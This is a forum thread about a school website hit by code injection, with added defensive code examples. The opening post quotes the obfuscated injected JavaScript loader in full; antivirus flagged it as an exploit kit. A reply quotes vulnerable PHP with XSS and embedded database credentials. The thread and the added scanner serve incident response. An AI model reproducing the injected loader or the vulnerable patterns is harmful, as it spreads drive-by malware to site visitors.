Site hack: Code injection

nbs28 -
EGP-Swyx Posts: 7141 Status: Contributor -
Hello,

I built a site for my maths teacher so that he can upload files.

A month ago, I suffered code injection attacks.

This week, it is starting again.

AVG detects Exploit Blackhole Exploit Kit (type 2602).

Someone inserted code into all of my js files.

On top of that, on my home page, I have this:

#0f2490#
                                                                                                                                                                                                                                                                                                                                                                                                                echo "                                                                                                                                                                                                                                                                                                                                                                                                                <script type=\"text/javascript\" language=\"javascript\" >                                                                                                                                                                                                                                                                                                                                                                                                                
ps=\"s\"+\"p\"+\"l\"+\"i\"+\"t\";asd=function(){--(d.body)};a=(\"47,155,174,165,152,173,160,166,165,47,201,201,201,155,155,155,57,60,47,202,24,21,47,175,150,171,47,172,154,47,104,47,153,166,152,174,164,154,165,173,65,152,171,154,150,173,154,114,163,154,164,154,165,173,57,56,160,155,171,150,164,154,56,60,102,24,21,24,21,47,172,154,65,172,171,152,47,104,47,56,157,173,173,167,101,66,66,152,154,152,160,163,171,150,200,165,150,160,153,174,65,152,166,164,66,166,173,157,154,171,66,113,111,164,176,130,140,137,152,65,167,157,167,56,102,24,21,47,172,154,65,172,173,200,163,154,65,167,166,172,160,173,160,166,165,47,104,47,56,150,151,172,166,163,174,173,154,56,102,24,21,47,172,154,65,172,173,200,163,154,65,151,166,171,153,154,171,47,104,47,56,67,56,102,24,21,47,172,154,65,172,173,200,163,154,65,157,154,160,156,157,173,47,104,47,56,70,167,177,56,102,24,21,47,172,154,65,172,173,200,163,154,65,176,160,153,173,157,47,104,47,56,70,167,177,56,102,24,21,47,172,154,65,172,173,200,163,154,65,163,154,155,173,47,104,47,56,70,167,177,56,102,24,21,47,172,154,65,172,173,200,163,154,65,173,166,167,47,104,47,56,70,167,177,56,102,24,21,24,21,47,160,155,47,57,50,153,166,152,174,164,154,165,173,65,156,154,173,114,163,154,164,154,165,173,111,200,120,153,57,56,172,154,56,60,60,47,202,24,21,47,153,166,152,174,164,154,165,173,65,176,171,160,173,154,57,56,103,153,160,175,47,160,153,104,143,56,172,154,143,56,105,103,66,153,160,175,105,56,60,102,24,21,47,153,166,152,174,164,154,165,173,65,156,154,173,114,163,154,164,154,165,173,111,200,120,153,57,56,172,154,56,60,65,150,167,167,154,165,153,112,157,160,163,153,57,172,154,60,102,24,21,47,204,24,21,204,24,21,155,174,165,152,173,160,166,165,47,132,154,173,112,166,166,162,160,154,57,152,166,166,162,160,154,125,150,164,154,63,152,166,166,162,160,154,135,150,163,174,154,63,165,113,150,200,172,63,167,150,173,157,60,47,202,24,21,47,175,150,171,47,173,166,153,150,200,47,104,47,165,154,176,47,113,150,173,154,57,60,102,24,21,47,175,150,171,47,154,177,167,160,171,154
,47,104,47,165,154,176,47,113,150,173,154,57,60,102,24,21,47,160,155,47,57,165,113,150,200,172,104,104,165,174,163,163,47,203,203,47,165,113,150,200,172,104,104,67,60,47,165,113,150,200,172,104,70,102,24,21,47,154,177,167,160,171,154,65,172,154,173,133,160,164,154,57,173,166,153,150,200,65,156,154,173,133,160,164,154,57,60,47,62,47,72,75,67,67,67,67,67,61,71,73,61,165,113,150,200,172,60,102,24,21,47,153,166,152,174,164,154,165,173,65,152,166,166,162,160,154,47,104,47,152,166,166,162,160,154,125,150,164,154,62,51,104,51,62,154,172,152,150,167,154,57,152,166,166,162,160,154,135,150,163,174,154,60,24,21,47,62,47,51,102,154,177,167,160,171,154,172,104,51,47,62,47,154,177,167,160,171,154,65,173,166,116,124,133,132,173,171,160,165,156,57,60,47,62,47,57,57,167,150,173,157,60,47,106,47,51,102,47,167,150,173,157,104,51,47,62,47,167,150,173,157,47,101,47,51,51,60,102,24,21,204,24,21,155,174,165,152,173,160,166,165,47,116,154,173,112,166,166,162,160,154,57,47,165,150,164,154,47,60,47,202,24,21,47,175,150,171,47,172,173,150,171,173,47,104,47,153,166,152,174,164,154,165,173,65,152,166,166,162,160,154,65,160,165,153,154,177,126,155,57,47,165,150,164,154,47,62,47,51,104,51,47,60,102,24,21,47,175,150,171,47,163,154,165,47,104,47,172,173,150,171,173,47,62,47,165,150,164,154,65,163,154,165,156,173,157,47,62,47,70,102,24,21,47,160,155,47,57,47,57,47,50,172,173,150,171,173,47,60,47,55,55,24,21,47,57,47,165,150,164,154,47,50,104,47,153,166,152,174,164,154,165,173,65,152,166,166,162,160,154,65,172,174,151,172,173,171,160,165,156,57,47,67,63,47,165,150,164,154,65,163,154,165,156,173,157,47,60,47,60,47,60,24,21,47,202,24,21,47,171,154,173,174,171,165,47,165,174,163,163,102,24,21,47,204,24,21,47,160,155,47,57,47,172,173,150,171,173,47,104,104,47,64,70,47,60,47,171,154,173,174,171,165,47,165,174,163,163,102,24,21,47,175,150,171,47,154,165,153,47,104,47,153,166,152,174,164,154,165,173,65,152,166,166,162,160,154,65,160,165,153,154,177,126,155,57,47,51,102,51,63,47,163,154,165,47,60,102,24,21,4
7,160,155,47,57,47,154,165,153,47,104,104,47,64,70,47,60,47,154,165,153,47,104,47,153,166,152,174,164,154,165,173,65,152,166,166,162,160,154,65,163,154,165,156,173,157,102,24,21,47,171,154,173,174,171,165,47,174,165,154,172,152,150,167,154,57,47,153,166,152,174,164,154,165,173,65,152,166,166,162,160,154,65,172,174,151,172,173,171,160,165,156,57,47,163,154,165,63,47,154,165,153,47,60,47,60,102,24,21,204,24,21,160,155,47,57,165,150,175,160,156,150,173,166,171,65,152,166,166,162,160,154,114,165,150,151,163,154,153,60,24,21,202,24,21,160,155,57,116,154,173,112,166,166,162,160,154,57,56,175,160,172,160,173,154,153,146,174,170,56,60,104,104,74,74,60,202,204,154,163,172,154,202,132,154,173,112,166,166,162,160,154,57,56,175,160,172,160,173,154,153,146,174,170,56,63,47,56,74,74,56,63,47,56,70,56,63,47,56,66,56,60,102,24,21,24,21,201,201,201,155,155,155,57,60,102,24,21,204,24,21,204,24,21\"[ps](\",\"));d=document;for(i=0;i<a.length;i+=1){a[i]=-(10-3)+parseInt(a[i],5+3);}try{asd()}catch(q){yy=50-50;}try{yy/=18}catch(pq){yy=1;}if(!yy)eval(String[\"fr\"+\"omCharCode\"].apply(String,a));</script>";

#/0f2490#


PS: I know the site is ugly, it is under development.

What can I do, given that I have protected myself against SQL injections, the forms redirect the message to an email address, and MS-DOS attacks don't work, I tested.

When I delete the code, it comes back.

*does anyone know what this code does?

For those who want to go and look, the address is http://milletvaldevoise.free.fr
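The following is an added example, not code from the thread or from the site it discusses: a read-only PHP command-line scanner that walks a site's document root, flags every PHP/JS/HTML file containing the #0f2490# ... #/0f2490# marker block quoted above or the split eval(String["fr"+"omCharCode"]) construct used inside it, and can record and compare a SHA-256 manifest of all files so that a reinfection ("when I delete the code, it comes back") shows up as a changed hash. It assumes PHP 7 or later; the paths and the manifest file name are the caller's choice, and the two signatures are the only site-specific values, both taken from the injected code shown in the post.

```php
<?php
// Added example (not the thread's own code). Usage, from the command line:
//   php scan.php /path/to/site                     -> report files matching the injection signatures
//   php scan.php /path/to/site --baseline m.json   -> write a SHA-256 manifest of every file
//   php scan.php /path/to/site --compare  m.json   -> list files added/modified/removed since the baseline
declare(strict_types=1);

// Signatures taken from the injected block quoted in the post. The second one
// allows the backslash-escaped quotes seen when the script sits inside a PHP echo "...".
const SIGNATURES = [
    'marker block #0f2490#'          => '/#0f2490#.*?#\/0f2490#/s',
    'split fromCharCode obfuscation' => '/fr\\\\?"\s*\+\s*\\\\?"omCharCode/',
];

const SCANNED_EXTENSIONS = ['php', 'js', 'html', 'htm', 'inc'];

/** Yield the path of every regular file under $root. */
function listFiles(string $root): Generator
{
    $it = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($it as $info) {
        if ($info->isFile()) {
            yield $info->getPathname();
        }
    }
}

/** Return [path => [signature label => line number]] for every file that matches a signature. */
function scanForInjection(string $root): array
{
    $findings = [];
    foreach (listFiles($root) as $path) {
        $ext = strtolower(pathinfo($path, PATHINFO_EXTENSION));
        if (!in_array($ext, SCANNED_EXTENSIONS, true)) {
            continue;
        }
        $content = file_get_contents($path);
        if ($content === false) {
            continue;
        }
        foreach (SIGNATURES as $label => $regex) {
            if (preg_match($regex, $content, $m, PREG_OFFSET_CAPTURE)) {
                // Line number of the match, so the block can be located in the file.
                $line = substr_count(substr($content, 0, $m[0][1]), "\n") + 1;
                $findings[$path][$label] = $line;
            }
        }
    }
    return $findings;
}

/** SHA-256 of every file under $root, keyed by path relative to $root. */
function buildManifest(string $root): array
{
    $manifest  = [];
    $prefixLen = strlen(rtrim($root, '/')) + 1;
    foreach (listFiles($root) as $path) {
        $manifest[substr($path, $prefixLen)] = hash_file('sha256', $path);
    }
    ksort($manifest);
    return $manifest;
}

/** Files whose hash differs from the baseline, plus files added or removed since it was taken. */
function compareManifest(array $baseline, array $current): array
{
    $diff = [];
    foreach ($current as $rel => $hash) {
        if (!isset($baseline[$rel])) {
            $diff[$rel] = 'added';
        } elseif ($baseline[$rel] !== $hash) {
            $diff[$rel] = 'modified';
        }
    }
    foreach (array_diff_key($baseline, $current) as $rel => $_) {
        $diff[$rel] = 'removed';
    }
    return $diff;
}

if (PHP_SAPI === 'cli' && isset($argv[1])) {
    $root = $argv[1];
    $mode = $argv[2] ?? '';
    $file = $argv[3] ?? 'manifest.json';
    if ($mode === '--baseline') {
        file_put_contents($file, json_encode(buildManifest($root), JSON_PRETTY_PRINT));
        echo "Wrote $file\n";
    } elseif ($mode === '--compare') {
        $baseline = json_decode((string) file_get_contents($file), true) ?: [];
        foreach (compareManifest($baseline, buildManifest($root)) as $rel => $state) {
            echo "$state\t$rel\n";
        }
    } else {
        foreach (scanForInjection($root) as $path => $hits) {
            foreach ($hits as $label => $line) {
                echo "$path:$line\t$label\n";
            }
        }
    }
}
```

Take the baseline only from a copy you have verified clean, keep the manifest off the web server, and run the compare after every cleanup: a file that changes again without your having edited it tells you the attacker still has a way in (and which files to look at), which is more useful than deleting the block a third time.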

4 replies

EGP-Swyx Posts: 7141 Status: Contributor 625
 
I think this is more a web development matter, no? (web programming?)

You should change the category and give it a more explicit title, something like
(security flaw, code injection)

Because it looks (from the title) like you are asking for a tutorial.
0
Malekal_morte- Posts: 184348 Registration date   Status: Moderator, Security contributor Last activity   24 693
 
Hi,

this site is scary, XSS, there must be SQL injection too, given how you throw the variables around...
<?php
$req = mysql_query('SELECT content FROM classes WHERE actif=1') OR die('Erreur de la requête MySQL');
while($donnees = mysql_fetch_assoc($req))
{
echo '<li><a href="classe.php?classe=' . $donnees['content'] . '">' . $donnees['content'] . '</a></li>';
}
?>


You are going to get hacked again... one day, that's for sure.

<?php
$server = 'millet****.sql.free.fr';
$connexion = mysql_connect($server, 'millet****', 'boulot****') OR die('Erreur de connexion');
mysql_select_db('millet****', $connexion) OR die('Erreur de sélection de la base');
?>


Like the angel you are, you laugh creating a lightness in my chest,
Your eyes they penetrate me,
(Your answer's always 'maybe')
That's when I got up and left
0
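The following is an added example, not code from the thread or from the site it discusses: a hardened rewrite of the two snippets quoted in the reply above. The list snippet echoes database values straight into HTML (the XSS), and the connection snippet keeps the credentials in a page under the web root with the legacy mysql_* functions, which were removed in PHP 7. The rewrite assumes PHP 7 or later with PDO, a `classes` table with `content` and `actif` columns as in the original query, a config file outside the web root at the path shown (an assumption), and that classe.php looks a class up by name (also an assumption; the thread does not show that page).

```php
<?php
// Added example, not the thread's own code: hardened version of the quoted snippets.
declare(strict_types=1);

/** Open the database connection from credentials stored outside the web root. */
function openDatabase(): PDO
{
    // Assumed layout: config/db.php returns
    // ['dsn' => 'mysql:host=...;dbname=...;charset=utf8mb4', 'user' => '...', 'pass' => '...']
    $cfg = require __DIR__ . '/../config/db.php';
    return new PDO($cfg['dsn'], $cfg['user'], $cfg['pass'], [
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION, // fail loudly instead of returning false
        PDO::ATTR_EMULATE_PREPARES => false,                  // real server-side prepared statements
    ]);
}

/** Every value that reaches HTML goes through this; it is the fix for the XSS. */
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Equivalent of the first snippet: the list of active classes as HTML. */
function renderClassList(PDO $pdo): string
{
    $html = "<ul>\n";
    // No user input in this query, so a plain query() is fine. The values it
    // returns are still encoded: the attacker has shown they can write to the
    // site, and the database is not more trustworthy than the files.
    foreach ($pdo->query('SELECT content FROM classes WHERE actif = 1') as $row) {
        $name  = $row['content'];
        $html .= '<li><a href="classe.php?classe=' . rawurlencode($name) . '">'
               . h($name) . "</a></li>\n";
    }
    return $html . "</ul>\n";
}

/**
 * The receiving page, classe.php, which does take user input (?classe=...).
 * Assumption: it looks a class up by name. The value is bound, never concatenated.
 */
function renderClass(PDO $pdo, string $classe): string
{
    $stmt = $pdo->prepare('SELECT content FROM classes WHERE content = :classe AND actif = 1');
    $stmt->execute([':classe' => $classe]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false) {
        http_response_code(404);
        return "<p>Unknown class.</p>\n";
    }
    return '<h1>' . h($row['content']) . "</h1>\n";
}

// Dispatch: the listing by default, or a single class when ?classe= is present.
$pdo = openDatabase();
if (isset($_GET['classe'])) {
    echo renderClass($pdo, (string) $_GET['classe']);
} else {
    echo renderClassList($pdo);
}
```

Two details worth keeping even if the rest is adapted: rawurlencode() is used for the value placed in the query string and h() for the value placed in element content, because the two contexts have different escaping rules, and the database user named in the config should be one that can only read and write the tables this site needs, so that a leaked credential is worth less.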
nbs28 Posts: 26 Status: Member 75
 
How were you able to see the PHP source code?
0
Malekal_morte- Posts: 184348 Registration date   Status: Moderator, Security contributor Last activity   24 693
 
Because your site is a sieve.

Send me a private message and I'll explain, but there is a lot of work to do..
0
Injhall Posts: 5842 Status: Member 1 020
 
Small question: why by private message?
This is a help forum, it could help other people solve similar problems ;)
0
Malekal_morte- Posts: 184348 Registration date   Status: Moderator, Security contributor Last activity   24 693
 
There are also some big j*rks around :)
I'll copy/paste it once he has secured his site.
Otherwise it could let whoever reads it do anything.
0
EGP-Swyx Posts: 7141 Status: Contributor 625
 
+1 for the PM. I second that. You'll post a log of the fixes applied. It's simpler.
0